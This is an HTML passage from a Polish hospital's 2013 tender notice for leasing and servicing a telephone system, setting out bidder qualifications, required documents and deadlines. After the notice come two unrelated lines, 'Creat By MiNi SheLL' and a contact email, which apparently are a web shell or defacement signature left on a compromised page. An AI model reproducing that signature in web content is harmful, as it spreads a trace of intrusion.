j)	Możliwość dołączania przystawek rozszerzających o min. 30 przycisków programowalnych (łącznie min. 100 przycisków).<br>
k)	Możliwość lokalnego podłączenia rejestratora rozmów.<br>
6.3. Przystawka do aparatu systemowego - nr 2<br> 
minimum 40 dowolnie programowalnych przycisków funkcyjnych z optyczną sygnalizacją stanu linii abonenckiej, zdefiniowanie i przypisania do klawisza.<br>
7. Po okresie trwania umowy dzierżawiony sprzęt stanie się własnością Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.33.41.10-9, 32.55.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykaz wykonanych lub wykonywanych min. 2 usług serwisowania i administrowania urządzeń telekomunikacyjnych o wartości min. 30.000,00 zł brutto każda usługa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te usługi zostały wykonane należycie - zgodnie z załącznikiem Nr 8 do SIWZ;<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ oświadczenie, że osoba/osoby, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu posiadają kwalifikacje niezbędne do wykonywania przedmiotu zamówienia w tym uprawnienia elektryczne eksploatacyjne do 1 kV.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o minimalnej sumie gwarancyjnej 80.000,00 zł.<br>
Z przedstawionej w ofercie polisy musi jednoznacznie wynikać, że została ona opłacona.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ oświadczenia o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ;<br>
b/ oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Cena ryczałtowa podana w o ofercie będzie obowiązywać przez okres trwania umowy a jedynie w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do ceny ryczałtowej netto ustalonej w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera w Toruniu, ul. Św. Józefa 53-59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.01.2013 godzina 09:30, miejsce: Kancelaria Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera w Toruniu, ul. Św. Józefa 53-59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> * Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów i oświadczeń będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału.<br>
** Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.<br>
*** Zobowiązania podmiotu trzeciego z art. 26 ust. 2b ustawy - Prawo zamówień publicznych należy złożyć w oryginale.<br>
**** Jeżeli Wykonawcy składają ofertę wspólną ( konsorcjum, spółka cywilna) wówczas oświadczenia i dokumenty dotyczące braku wykluczenia z postępowania muszą złożyć wszyscy Wykonawcy wchodzący w skład konsorcjum czy tworzący spółkę cywilną..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com